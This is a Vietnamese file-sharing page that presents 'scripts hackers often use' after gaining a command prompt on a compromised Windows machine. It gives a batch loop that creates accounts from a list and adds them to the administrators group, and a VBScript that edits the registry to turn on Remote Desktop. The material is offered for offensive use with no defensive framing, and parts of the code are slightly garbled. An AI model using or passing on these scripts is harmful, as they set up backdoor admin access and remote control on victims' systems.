Một số Script tuyệt hay mà hacker thường dùng!

Chia sẻ: Trần Hữu Bắc | Ngày: | Loại File: DOC | Số trang:2

0
344
lượt xem
186
download

Một số Script tuyệt hay mà hacker thường dùng!

Mô tả tài liệu
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Rất nhiều lỗi kiến cho máy tính bị chiếm quyền điều khiển và hacker có thể kết nối tới giao diện DOS của máy tính. ( Cách khai thác một số lỗi cơ bản chúng ta không bàn ở chủ đề này mà để một bài viết gần đây). Khi đã kết nối tới Command Promt việc hacker thường làm là tạo ra một tài khoản thuộc nhóm Admin.

Chủ đề:
Lưu

Nội dung Text: Một số Script tuyệt hay mà hacker thường dùng!

  1. Một số Script tuyệt hay mà hacker thường dùng! 1. Tạo User trong môi trường Dos: Rất nhiều lỗi kiến cho máy tính bị chiếm quyền điều khiển và hacker có thể kết nối tới giao diện DOS của máy tính. ( Cách khai thác một số lỗi cơ bản chúng ta không bàn ở chủ đề này mà để một bài viết gần đây). Khi đã kết nối tới Command Promt việc hacker thường làm là tạo ra một tài khoản thuộc nhóm Admin. Câu lệnh như sau: for /f "tokens=1,2" %%x in (userlist.txt) do net user %%x %%y /add for /f %%x in (userlist.txt) do net localgroup administrators %%x /add Phần userlist.txt thì nội dung như sau: thaona 123456 nathao 123456 Có thể save file thành Script cho dễ thực hiện ( thường hacker đã có sẵn script và load từ ftp server xuống để chạy ) Và đây là Video: 2. Sau khi đã có tài khoản admin rồi tiếp theo là gì nhỉ? Enable remote desktop trong môi trường DOS luôn chứ? Lúc này lại sử dụng môt VB script để enable Remote Desktop Option Explicit Dim WSHShell, n, MyBox, p, t, mustboot, errnum, vers Dim enab, disab, jobfunc, itemtype Set WSHShell = WScript.CreateObject("WScript.Shell") p = "HKLM\SYSTEM\CurrentControlSet\Control\Termina l Server\" p = p & "fDenyTSConnections" itemtype = "REG_DWORD" Err.Clear On Error Resume Next n = WSHShell.RegRead (p) On Error Goto 0 errnum = Err.Number if errnum 0 then WSHShell.RegWrite p, 0, itemtype End If If n = 0 Then n=1 WSHShell.RegWrite p, n, itemtype ElseIf n = 1 then
  2. n=0 WSHShell.RegWrite p, n, itemtype End If Và đây là Video:

CÓ THỂ BẠN MUỐN DOWNLOAD

Đồng bộ tài khoản